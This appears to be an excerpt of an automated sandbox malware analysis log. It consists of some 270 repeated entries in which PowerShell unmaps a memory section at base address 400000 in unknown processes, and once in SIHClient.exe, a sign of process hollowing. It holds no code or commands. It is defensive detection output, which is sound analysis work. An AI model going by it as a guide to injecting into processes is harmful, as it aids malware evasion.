Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\System32\SIHClient.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
